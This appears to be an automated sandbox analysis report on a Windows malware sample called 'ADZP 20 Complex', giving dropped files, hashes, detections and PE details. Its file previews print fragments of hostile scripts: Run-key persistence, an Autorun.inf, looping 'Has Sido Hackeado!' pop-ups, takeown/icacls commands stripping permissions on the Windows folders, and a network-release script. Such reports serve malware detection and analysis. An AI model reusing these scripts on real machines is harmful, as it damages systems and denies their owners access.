                  21:23:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Twain_20 C:\Users\user\AppData\Local\Temp\Twain_20.cmd
                  21:23:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Twain_20 C:\Users\user\AppData\Local\Temp\Twain_20.cmd

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat

                  Download File
                  Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
                  Category:dropped
                  Size (bytes):17630
                  Entropy (8bit):4.672657117908346
                  Encrypted:false
                  SSDEEP:192:Kn0iMJWap3ahz9j3E301VaYYATCdhSouXKN:PJWo3yzHVbYMW
                  MD5:190E7CFA7D6DE532BA4498CA3D38B47D
                  SHA1:7D4EA5CE61962C0445D955A44DD31226FA8C736E
                  SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
                  SHA-512:5A87B4BAC67957ACBC6DFAB08CF9B3E1110E4B496B66110A44F7B2D0EC75B950D7569B6220C4A5AB3597DB032E70B16D5A5E6EE4AB23102F6D12FEA7BDC11598
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:@shift /0..@echo off..title ADZP 20 Complex..goto Phase-1..:Phase-1..echo off>>ErrorCritico.vbs..echo do>>ErrorCritico.vbs..echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs..echo loop>>ErrorCritico.vbs..echo off>>Advertencia.vbs..echo do>>Advertencia.vbs..echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs..echo loop>>Advertencia.vbs..echo off>>Informacion.vbs..echo do>>Informacion.vbs..echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs..echo loop>>Informacion.vbs..echo off>>Autorun.inf..echo [AutoRun]>>Autorun.inf..echo Open=ADZP 20 Complex>>Autorun.inf..echo Action=Start ADZP 20 Complex>>Autorun.inf..echo Label=???>>Autorun.inf..echo off>>Taskse.exe..echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand

                  C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat

                  Download File
                  Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
                  Category:dropped
                  Size (bytes):17630
                  Entropy (8bit):4.672657117908346
                  Encrypted:false
                  SSDEEP:192:Kn0iMJWap3ahz9j3E301VaYYATCdhSouXKN:PJWo3yzHVbYMW
                  MD5:190E7CFA7D6DE532BA4498CA3D38B47D
                  SHA1:7D4EA5CE61962C0445D955A44DD31226FA8C736E
                  SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
                  SHA-512:5A87B4BAC67957ACBC6DFAB08CF9B3E1110E4B496B66110A44F7B2D0EC75B950D7569B6220C4A5AB3597DB032E70B16D5A5E6EE4AB23102F6D12FEA7BDC11598
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:@shift /0..@echo off..title ADZP 20 Complex..goto Phase-1..:Phase-1..echo off>>ErrorCritico.vbs..echo do>>ErrorCritico.vbs..echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs..echo loop>>ErrorCritico.vbs..echo off>>Advertencia.vbs..echo do>>Advertencia.vbs..echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs..echo loop>>Advertencia.vbs..echo off>>Informacion.vbs..echo do>>Informacion.vbs..echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs..echo loop>>Informacion.vbs..echo off>>Autorun.inf..echo [AutoRun]>>Autorun.inf..echo Open=ADZP 20 Complex>>Autorun.inf..echo Action=Start ADZP 20 Complex>>Autorun.inf..echo Label=???>>Autorun.inf..echo off>>Taskse.exe..echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand

                  C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat

                  Download File
                  Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
                  Category:dropped
                  Size (bytes):17630
                  Entropy (8bit):4.672657117908346
                  Encrypted:false
                  SSDEEP:192:Kn0iMJWap3ahz9j3E301VaYYATCdhSouXKN:PJWo3yzHVbYMW
                  MD5:190E7CFA7D6DE532BA4498CA3D38B47D
                  SHA1:7D4EA5CE61962C0445D955A44DD31226FA8C736E
                  SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
                  SHA-512:5A87B4BAC67957ACBC6DFAB08CF9B3E1110E4B496B66110A44F7B2D0EC75B950D7569B6220C4A5AB3597DB032E70B16D5A5E6EE4AB23102F6D12FEA7BDC11598
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:@shift /0..@echo off..title ADZP 20 Complex..goto Phase-1..:Phase-1..echo off>>ErrorCritico.vbs..echo do>>ErrorCritico.vbs..echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs..echo loop>>ErrorCritico.vbs..echo off>>Advertencia.vbs..echo do>>Advertencia.vbs..echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs..echo loop>>Advertencia.vbs..echo off>>Informacion.vbs..echo do>>Informacion.vbs..echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs..echo loop>>Informacion.vbs..echo off>>Autorun.inf..echo [AutoRun]>>Autorun.inf..echo Open=ADZP 20 Complex>>Autorun.inf..echo Action=Start ADZP 20 Complex>>Autorun.inf..echo Label=???>>Autorun.inf..echo off>>Taskse.exe..echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand

                  C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat

                  Download File
                  Process:C:\Users\user\Desktop\ADZP 20 Complex.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (817), with CRLF line terminators
                  Category:dropped
                  Size (bytes):17630
                  Entropy (8bit):4.672657117908346
                  Encrypted:false
                  SSDEEP:192:Kn0iMJWap3ahz9j3E301VaYYATCdhSouXKN:PJWo3yzHVbYMW
                  MD5:190E7CFA7D6DE532BA4498CA3D38B47D
                  SHA1:7D4EA5CE61962C0445D955A44DD31226FA8C736E
                  SHA-256:FAEE2B0AC2218435A6973B87277B29010C988EFEFDCD7FE0E107808C2CC0F282
                  SHA-512:5A87B4BAC67957ACBC6DFAB08CF9B3E1110E4B496B66110A44F7B2D0EC75B950D7569B6220C4A5AB3597DB032E70B16D5A5E6EE4AB23102F6D12FEA7BDC11598
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  Preview:@shift /0..@echo off..title ADZP 20 Complex..goto Phase-1..:Phase-1..echo off>>ErrorCritico.vbs..echo do>>ErrorCritico.vbs..echo Mensaje=msgbox("Error Critico",16,"Error")>>ErrorCritico.vbs..echo loop>>ErrorCritico.vbs..echo off>>Advertencia.vbs..echo do>>Advertencia.vbs..echo Mensaje=msgbox("Error en El Sistema",48,"Error")>>Advertencia.vbs..echo loop>>Advertencia.vbs..echo off>>Informacion.vbs..echo do>>Informacion.vbs..echo Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")>>Informacion.vbs..echo loop>>Informacion.vbs..echo off>>Autorun.inf..echo [AutoRun]>>Autorun.inf..echo Open=ADZP 20 Complex>>Autorun.inf..echo Action=Start ADZP 20 Complex>>Autorun.inf..echo Label=???>>Autorun.inf..echo off>>Taskse.exe..echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand

                  C:\Users\user\AppData\Local\Temp\Twain_20.cmd

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):39
                  Entropy (8bit):4.599379462396518
                  Encrypted:false
                  SSDEEP:3:FJut1evM/vn:FJOevuvn
                  MD5:BC987A29D1417F4BF9ED17152376BABE
                  SHA1:EDF76EA21860C46436E7897588D087620F361EF0
                  SHA-256:D4F0728CE337A4FC3F0B53E87FF51F8C9B76BA13E935F3CA1CE1B9DE3A7C2B7F
                  SHA-512:3DC29B489BBEE251BFA4110DD13E51EAAEF4988F9909E58581C87BA8CBA1D06989FA01E61C6FD01D07241560E4BE5A45512C2E01C3E649838048F9376C96157E
                  Malicious:false
                  Preview:call C:\Windows\System32\Twain_20.dll..

                  C:\Users\user\Desktop\Advertencia.vbs

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):236
                  Entropy (8bit):4.560600430104363
                  Encrypted:false
                  SSDEEP:6:PiVF6RNFwcHeiVF6RNFwcHeiVF6RNFwcHu2F6RNFwcHu:A6PH76PH76PHuE6PHu
                  MD5:58E27B22E870ABEAF07364D349E31472
                  SHA1:288A6FCD9EF6E1404DD35DDB6B622A4DF263E010
                  SHA-256:29E0DAF34E3D5364119B7BC5F7D4E860BBB3E3B6DE14F5ACE3653F36326D4544
                  SHA-512:503E0679E050311F5D60692AFB2349E1D0C8A5EFDE74B3CDBFF8BD9D5E37CEB45DD77D1973FBA8F675D3CA76622D9D0A6FD4E1F54D0091BD15362B66D11469BD
                  Malicious:true
                  Preview:do..Mensaje=msgbox("Error en El Sistema",48,"Error")..loop..do..Mensaje=msgbox("Error en El Sistema",48,"Error")..loop..do..Mensaje=msgbox("Error en El Sistema",48,"Error")..loop..Mensaje=msgbox("Error en El Sistema",48,"Error")..loop..

                  C:\Users\user\Desktop\Autorun.inf

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:Microsoft Windows Autorun file
                  Category:dropped
                  Size (bytes):274
                  Entropy (8bit):4.816492330474297
                  Encrypted:false
                  SSDEEP:6:y1t+3sebc3qc1t+3sebc3qhRn1t+3sebc3qYebc3qx:irQqrQvrrQqQP
                  MD5:C66004DB9B30431954B791CE903BE57F
                  SHA1:5940B6B4BCF84697546FC05C16F5D11AFBEA2674
                  SHA-256:CEDBECD3BD6E98098A58A7A2FC74FD9CADD00D8B21E971A8854A1DE238BBFB7D
                  SHA-512:C4E8F419549A4948E18DDEC17B39889F7AFEA77C93C2E9EEE40A986E390D651460B1300820A6BA31DDA33827B6FB7F3E8A8F8612BACA68F46125075B3BC2E854
                  Malicious:false
                  Preview:[AutoRun]..Open=ADZP 20 Complex..Action=Start ADZP 20 Complex..Label=???..[AutoRun]..Open=ADZP 20 Complex..Action=Start ADZP 20 Complex..Label=???..[AutoRun]..[AutoRun]..Open=ADZP 20 Complex..Action=Start ADZP 20 Complex..Label=???..Action=Start ADZP 20 Complex..Label=???..

                  C:\Users\user\Desktop\ErrorCritico.vbs

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):216
                  Entropy (8bit):4.517614466735074
                  Encrypted:false
                  SSDEEP:6:PiVF6RUJSAsHeiVF6RUJSAsHeiVF6RUJSAsHpiVF6RUJSAsHl:A69rH769rH769rH669rHl
                  MD5:A7FD2AE308F97377C696EC4C4EAD9416
                  SHA1:5803FC88CC7B489589185001CA1439F292A2983A
                  SHA-256:08BC521E2869E0A3ED6D5E2375B5D5C106D2B9E127C19D4F3A578770B4D49431
                  SHA-512:E6B5CD05F086B31F45C0677D057185334CBC68CCD18FEE913FB0023386C04D12F716671F01B1404A73038C3EFB829DC112FA63F39C7883807FB882A98E21EC5D
                  Malicious:true
                  Preview:do..Mensaje=msgbox("Error Critico",16,"Error")..loop..do..Mensaje=msgbox("Error Critico",16,"Error")..loop..do..Mensaje=msgbox("Error Critico",16,"Error")..do..Mensaje=msgbox("Error Critico",16,"Error")..loop..loop..

                  C:\Users\user\Desktop\Informacion.vbs

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):270
                  Entropy (8bit):4.9225156073923015
                  Encrypted:false
                  SSDEEP:6:PiLk0HEBK4aX+3xiLk0HEBK4aX+3xiLk0HEBK4aX+3aiLk0HEBK4aX+3p:yHoSJHoSJHoSKHoSw
                  MD5:60F46EA792A5DFFB914B5DD117F3FE2D
                  SHA1:B9514637F141A9A01349AF7525CAE3D68B6EF1EE
                  SHA-256:176612256E253B6D51C2416CD6D6B67D0841600CC93DF96847D7C0ADBCC2AF93
                  SHA-512:0802E59F95CEA066B1C38DD76DB59779489F639726BE5D6AC4B97284452BFE012A7F7086A3C1625276075536903A8A28648214C2BDA5554F8F600DA7088CA6FB
                  Malicious:true
                  Preview:do..Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")..loop..do..Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")..loop..do..Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")..do..Mensaje=MsgBox("Has Sido Hackeado!",64,"ADZP 20 Complex")..loop..

                  C:\Users\user\Desktop\Taskdl.bat

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):655
                  Entropy (8bit):4.699536698426096
                  Encrypted:false
                  SSDEEP:12:w74PFs614O6Zrw74PFs614O6Zrw74PFs614O6Zrw74PFs614OB:A4PFs614O6ZrA4PFs614O6ZrA4PFs61i
                  MD5:D72C8F42DA75FD710F2C2049EF99AE22
                  SHA1:4BA68526F571015D92D168D782BEF2279886C64E
                  SHA-256:2888909CE97C3AEC42762412C31A8DEC522A38DD3C4F37392EFED2F22CD6EA93
                  SHA-512:AAB64BB5C94670D6154E5D72239390C9E484100B5563AB5A67E1495C4D374ED8CBDB6D84D6BD7E72816173B5A25C1C52AD9E18468D5D7444E1C44216F85B9811
                  Malicious:false
                  Preview:@echo off..title Taskdl..takeown /f "C:\Windows\System32" /r..icacls "C:\Windows\System32" /reset /t /c /q..takeown /f "C:\Windows" /r..icacls "C:\Windows" /reset /t /c /q..@echo off..title Taskdl..takeown /f "C:\Windows\System32" /r..icacls "C:\Windows\System32" /reset /t /c /q..takeown /f "C:\Windows" /r..icacls "C:\Windows" /reset /t /c /q..@echo off..title Taskdl..takeown /f "C:\Windows\System32" /r..icacls "C:\Windows\System32" /reset /t /c /q..takeown /f "C:\Windows" /r..icacls "C:\Windows" /reset /t /c /q..@echo off..title Taskdl..takeown /f "C:\Windows\System32" /r..icacls "C:\Windows\System32" /reset /t /c /q..takeown /f "C:\Windows" /r..

                  C:\Users\user\Desktop\Taskse.exe

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with very long lines (477), with CRLF line terminators
                  Category:dropped
                  Size (bytes):15931
                  Entropy (8bit):3.298409240467509
                  Encrypted:false
                  SSDEEP:384:qxNZ/DcOQvZ/2daJlUVu/qmVnQdrGtWNd1LqmzUBdc6:QrbtQvh2daJ9FQdryW9+w6j
                  MD5:5818B565790E0C2EF6675FCB34AC3A46
                  SHA1:E9A76A47371CB6E1FC7E102057A660713182DF62
                  SHA-256:3697C12440CAA67CA967145AFD9037E59A32B810C065F5E8BD6437AD00AACC91
                  SHA-512:D2EE198F78EF22A36531AD8A8D21A1041C2DE4D9C41785EC0A9420B5A254F6F735BA4664D7FB3F729F7C9855A0E6B17C01785DCEAA4B3EE53F406BE51730B9AD
                  Malicious:false
                  Preview:2434814743715103189409577387924141266615698130701893229350285026175306292665921349239665222875310226443402311799006272662291120300124192565396142583047699306173751406514797271881660245402586435322613413089850247456733114417279184321836284922533427917920312907549623391615429697296552864017298455105528933254222495245381508192021779711353639417195148572561711584251677679297661833313446155392774796943180170305826666428714203741812412268683628813210892073315957..313531497023135254491351618188228482949628997670424939107514111323861282615227119122989474362653124660176182556014519766755443264114717963220706161028154222362184391641516028431559522341318152630114811276992675413887202182486612051111872647112482275784205446412604227301612824755321982520431081152357798325832855360302517129176252127068811422623195451980220160112032605798471289157191615617294806169007978169982070011291398915415355631051031832014310142950824936190582307023344..22125320721719830089307212942820025780629732659319012772660

                  C:\Users\user\Desktop\Twain_20.cmd

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):39
                  Entropy (8bit):4.599379462396518
                  Encrypted:false
                  SSDEEP:3:FJut1evM/vn:FJOevuvn
                  MD5:BC987A29D1417F4BF9ED17152376BABE
                  SHA1:EDF76EA21860C46436E7897588D087620F361EF0
                  SHA-256:D4F0728CE337A4FC3F0B53E87FF51F8C9B76BA13E935F3CA1CE1B9DE3A7C2B7F
                  SHA-512:3DC29B489BBEE251BFA4110DD13E51EAAEF4988F9909E58581C87BA8CBA1D06989FA01E61C6FD01D07241560E4BE5A45512C2E01C3E649838048F9376C96157E
                  Malicious:false
                  Preview:call C:\Windows\System32\Twain_20.dll..

                  C:\Users\user\Desktop\Twain_20.dll

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):108544
                  Entropy (8bit):7.015918699786388
                  Encrypted:false
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  MD5:8B6A377F9A67D5482A8EBA5708F45BB2
                  SHA1:7197436525E568606850EE5E033C43AEA1C3BC91
                  SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
                  SHA-512:644E51798399168530B05E629B414DD80CAC678BD3C8D4A5D164F55736A2B2FD380D3CA4640F7A034C8F043C06B1527B473E2D17DA088D5E97DE6EA04120DD72
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Twain_20.dll, Author: Joe Security
                  • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Twain_20.dll, Author: Joe Security
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 63%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@.........................................................................lq...........I..........................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc....I.......J...^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Desktop\Twain_20.dll:Zone.Identifier

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Users\user\Desktop\windowswimn32.bat

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):49
                  Entropy (8bit):4.173297793439888
                  Encrypted:false
                  SSDEEP:3:mKDDUnXrLDQhshov:hAvQv
                  MD5:CFB046D3C9513B92C1B287DA26F97C28
                  SHA1:EA8208C4DAD826B7FDB3B5B728863A95E86D4383
                  SHA-256:A06F170D4F92BF290E38B0CE1C05BB59C95DE2797B1A5253B949AD7E1BE9818B
                  SHA-512:DBEEEA4D284F59E1455A5426334CAA02458E88833AEECE9817C51BE616697CA4C399B2A9D0E8E44BF4A5EE63D0B37C0AED68C01F1748FA5A23ED6D2AF62B3340
                  Malicious:false
                  Preview:@echo off..break off..ipconfig/release_all..end..

                  C:\Windows\System32\Twain_20.dll

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):108544
                  Entropy (8bit):7.015918699786388
                  Encrypted:false
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  MD5:8B6A377F9A67D5482A8EBA5708F45BB2
                  SHA1:7197436525E568606850EE5E033C43AEA1C3BC91
                  SHA-256:6CA11C8B6442DB97C02F3B0F73DB61F58C96D52E8A880E33ABEE5B10807D993F
                  SHA-512:644E51798399168530B05E629B414DD80CAC678BD3C8D4A5D164F55736A2B2FD380D3CA4640F7A034C8F043C06B1527B473E2D17DA088D5E97DE6EA04120DD72
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 63%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@.........................................................................lq...........I..........................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc....I.......J...^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\System32\Twain_20.dll:Zone.Identifier

                  Download File
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0

                  Static File Info

                  General

                  File type:PE32 executable (console) Intel 80386, for MS Windows
                  Entropy (8bit):7.015918699786388
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.94%
                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • VXD Driver (31/22) 0.00%
                  File name:ADZP 20 Complex.exe
                  File size:108'544 bytes
                  MD5:8b6a377f9a67d5482a8eba5708f45bb2
                  SHA1:7197436525e568606850ee5e033c43aea1c3bc91
                  SHA256:6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
                  SHA512:644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
                  SSDEEP:3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8
                  TLSH:B2B38D41F2E242F7EAF2053100A6712F973663389764E8EBC75C2D529913AD1A73D3E9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....................0....@........................................................................

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x401000
                  Entrypoint Section:.code
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows cui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:
                  Time Stamp:0x5D40055D [Tue Jul 30 08:52:45 2019 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:2c5f2513605e48f2d8ea5440a870cb9e

                  Entrypoint Preview

                  Instruction
                  push 000000ACh
                  push 00000000h
                  push 00418068h
                  call 00007F9DE8E04831h
                  add esp, 0Ch
                  push 00000000h
                  call 00007F9DE8E0482Ah
                  mov dword ptr [0041806Ch], eax
                  push 00000000h
                  push 00001000h
                  push 00000000h
                  call 00007F9DE8E04817h
                  mov dword ptr [00418068h], eax
                  call 00007F9DE8E04791h
                  mov eax, 0041707Ch
                  mov dword ptr [0041808Ch], eax
                  call 00007F9DE8E0DC52h
                  call 00007F9DE8E0D9BAh
                  call 00007F9DE8E0A898h
                  call 00007F9DE8E0A11Ch
                  call 00007F9DE8E09BAFh
                  call 00007F9DE8E09929h
                  call 00007F9DE8E08DCDh
                  call 00007F9DE8E0854Dh
                  call 00007F9DE8E04B0Fh
                  call 00007F9DE8E0C518h
                  call 00007F9DE8E0AFC0h
                  mov edx, 0041702Eh
                  lea ecx, dword ptr [00418074h]
                  call 00007F9DE8E047A8h
                  push FFFFFFF5h
                  call 00007F9DE8E047B8h
                  mov dword ptr [00418094h], eax
                  mov eax, 00000200h
                  push eax
                  lea eax, dword ptr [00418110h]
                  push eax
                  xor eax, eax
                  push eax
                  push 00000015h
                  push 00000004h
                  call 00007F9DE8E09B72h
                  push dword ptr [004180F8h]

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1716c0xc8.data
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x4980.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x174700x23c.data
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .code0x10000x387e0x3a0046da2c5018752470fd3127bf22d63b95False0.4595231681034483data5.529218938453912IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .text0x50000xd9620xda00e1a026e66953c410d7f60b1f1e3c560fFalse0.5144244552752294data6.56248809649253IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x130000x33a50x3400a16842a34a5da6feda9533bb3e83c3c1False0.8049128605769231data7.111835561466389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x170000x178c0x12000e393c9154c78f64d30710272e678f07False0.4029947916666667data5.098508569279054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x190000x49800x4a0049bccf31418201908e0ba34120c9b108False0.9745565878378378data7.951434337190055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_RCDATA0x1921c0xezlib compressed data1.5714285714285714
                  RT_RCDATA0x1922c0x1very short file (no magic)9.0
                  RT_RCDATA0x192300x44d7data1.0009079044430573
                  RT_RCDATA0x1d7080x14data1.45
                  RT_MANIFEST0x1d71c0x263XML 1.0 document, ASCII text0.5319148936170213

                  Imports

                  DLLImport
                  MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
